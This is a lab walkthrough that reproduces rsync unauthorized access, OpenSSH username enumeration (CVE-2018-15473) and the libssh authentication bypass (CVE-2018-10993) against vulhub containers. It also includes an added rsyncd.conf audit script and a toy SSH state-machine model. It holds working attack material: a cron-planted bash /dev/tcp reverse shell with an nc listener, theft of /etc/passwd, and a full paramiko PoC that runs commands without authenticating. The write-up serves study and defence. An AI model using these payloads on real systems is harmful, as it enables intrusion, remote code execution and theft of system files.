Service Attack and Defense: Application Protocols rsync & ssh, Vulnerability Reproduction
Vulnerability reproduction
Misconfiguration: unauthorized access to rsync file backups
rsync default port: 873
rsync is a data backup tool for Linux that supports remote file transfer over both the rsync protocol and ssh.
The rsync daemon listens on port 873 by default. If the target runs the rsync service with no ACL and no access password configured, anyone who can reach the port can read and write files on the target server.
Lab environment: vulhub or vulfocus
Reference: rsync unauthorized access
Start the environment:
After the environment is started, we access it with the rsync command:
rsync rsync://your-ip:873/
// the lab maps port 873 to another host port, here 43983:
rsync rsync://192.168.100.134:43983
This lists the module names. Listing the contents of the src module:
rsync rsync://your-ip:873/src/
rsync rsync://192.168.100.134:43983/src
This turns out to be the Linux root filesystem, so arbitrary files can be downloaded:
rsync -av rsync://your-ip:873/src/etc/passwd ./
rsync rsync://192.168.100.134:43983/src/etc/passwd ./
Uploading can be tried as well. Upload the passwd file to the /src directory:
rsync ./passwd rsync://192.168.100.134:43983/src
Verify by listing the module again:
rsync rsync://192.168.100.134:43983/src
The lab session had expired, so the environment was restarted (note the new mapped port) before continuing.
Reverse shell:
// download the crontab file
rsync -av rsync://192.168.100.134:39525/src/etc/crontab ./
Viewing the downloaded file, note the meaning of this line:
17 * * * * root cd / && run-parts --report /etc/cron.hourly
It means that run-parts --report /etc/cron.hourly is executed as root at the 17th minute of every hour, so anything placed in /etc/cron.hourly runs within the hour.
Create a shell file containing the reverse shell command:
#!/bin/bash
/bin/bash -i >& /dev/tcp/192.168.100.146/6666 0>&1
Grant execute permission:
chmod +x shell
Upload the shell file to /etc/cron.hourly:
rsync -av shell rsync://192.168.100.134:39525/src/etc/cron.hourly
Listen locally:
nc -lvvp 6666
Then wait for the cron job to fire and the shell to connect back.
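Added defensive example (not from the original post or from the vulhub image): a small Python audit of an rsyncd.conf that flags the conditions the walkthrough above depends on, namely a module that is writable, has no auth users or hosts allow, and exports /. The sample configuration is constructed; its src module mirrors the exposed module above and backup shows the settings that close the hole.

```python
# Constructed sample config: "src" reproduces the misconfiguration exploited
# above, "backup" shows the same daemon locked down.
SAMPLE_RSYNCD_CONF = """\
read only = yes
[src]
    path = /
    read only = no
[backup]
    path = /data/backup
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
"""


def parse_rsyncd_conf(text):
    """Return {module: {param: value}}; global parameters live under ''."""
    sections, current = {"": {}}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_modules(text):
    """List (module, issue) pairs that allow anonymous read or write access."""
    sections = parse_rsyncd_conf(text)
    findings = []
    for name, params in sections.items():
        if name == "":
            continue
        # rsync default ("read only = yes") < global section < module section
        eff = {"read only": "yes", **sections[""], **params}
        if not eff.get("auth users"):
            findings.append((name, "no 'auth users': reachable without a password"))
        if not eff.get("hosts allow"):
            findings.append((name, "no 'hosts allow': any source address may connect"))
        if eff["read only"].lower() in ("no", "false", "0"):
            findings.append((name, "read only = no: clients can upload files"))
        if eff.get("path") == "/":
            findings.append((name, "path = /: exposes the whole filesystem"))
    return findings
```

Run audit_modules() over the daemon's real /etc/rsyncd.conf; any module reported with all four findings is exactly the situation reproduced above.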
OpenSSH username enumeration vulnerability
Reference: CVE-2018-15473
OpenSSH versions before 7.7 contain a username enumeration vulnerability that lets an attacker determine whether a given username exists on the target host.
Start the environment:
After the environment is started, run the following on the client and enter the password vulhub to log in to the container:
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@your-ip -p 20022
A public exploit can be used directly:
Exploit link: CVE-2018-15473-Exploit
python sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt your-ip
Method two:
Metasploit can also be used for verification:
msfconsole                     // start msf
search ssh                     // search for modules
use 53                         // index of the enumeration module in the search output
set rhosts 192.168.100.134
set rport 20022
set user_file "dictionary path"
run
Configuration:
Execution:
The run shows that root, example, vulhub and nobody are existing users.
libssh authentication bypass vulnerability
Reference: libssh server-side permission authentication bypass vulnerability
libssh is a multi-platform C library that implements the SSHv2 protocol on both the client and server sides. A logic vulnerability was discovered in libssh's server-side state machine: an attacker can send a MSG_USERAUTH_SUCCESS message before authentication has completed, bypassing authentication and gaining access to the target SSH server.
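Added example, not libssh's code and not the PoC below: a toy Python model of a server-side SSH state machine that shows why the bypass works and how a per-state allow-list of client messages rejects it. Message numbers are from RFC 4252/4254; strict=False reproduces the flawed behaviour described above, and the credential pair is the constructed lab account.

```python
# Message numbers from RFC 4252 (auth) and RFC 4254 (channels).
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90

# Messages a *client* may legitimately send in each server state.
# USERAUTH_SUCCESS is server-to-client only, so it appears in neither set.
CLIENT_MESSAGES_ALLOWED = {
    "authenticating": {SSH_MSG_USERAUTH_REQUEST},
    "authenticated": {SSH_MSG_CHANNEL_OPEN},
}
VALID_CREDENTIALS = ("myuser", "mypassword")  # constructed, matches the lab account


class ServerSession:
    """Toy model of a server-side SSH state machine (not libssh's code)."""

    def __init__(self, strict=True):
        self.strict = strict  # False reproduces the CVE-2018-10993 behaviour
        self.state = "authenticating"
        self.channels = 0

    def handle(self, msg_type, payload=None):
        """Process one client packet and return the server's decision."""
        if self.strict and msg_type not in CLIENT_MESSAGES_ALLOWED[self.state]:
            return f"rejected: message {msg_type} not allowed in state {self.state}"
        if msg_type == SSH_MSG_USERAUTH_REQUEST:
            if payload == VALID_CREDENTIALS:  # a real server checks a key or password
                self.state = "authenticated"
                return "userauth success"
            return "userauth failure"
        if msg_type == SSH_MSG_USERAUTH_SUCCESS:
            # Vulnerable path: the handler meant for the client side runs on
            # the server and marks the session authenticated unconditionally.
            self.state = "authenticated"
            return "authenticated without credentials"
        if msg_type == SSH_MSG_CHANNEL_OPEN:
            if self.state != "authenticated":
                return "rejected: channel open before authentication"
            self.channels += 1
            return "channel opened"
        return f"rejected: unknown message {msg_type}"


def run_bypass_attempt(strict):
    """Replay the PoC's packet order against the model and report the outcome."""
    session = ServerSession(strict=strict)
    first = session.handle(SSH_MSG_USERAUTH_SUCCESS)
    second = session.handle(SSH_MSG_CHANNEL_OPEN)
    return first, second, session.channels
```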
Start the lab environment:
After the environment is started, we can connect to your-ip:2222 (credentials: myuser:mypassword).
Exploitation:
Reference: CVE-2018-10993
The PoC from the reference can be used directly:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)

bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        # send USERAUTH_SUCCESS (normally a server-to-client message) before authenticating
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        # a vulnerable server now treats the session as authenticated
        client = transport.open_session(timeout=10)
        client.exec_command(command)
        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output + error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
Verification:
python libssh_poc.py 192.168.100.134 2222 "id"
python libssh_poc.py 192.168.100.134 2222 "whoami"
python libssh_poc.py 192.168.100.134 2222 "touch /123.txt"
python libssh_poc.py 192.168.100.134 2222 "ls /"
The file was created successfully: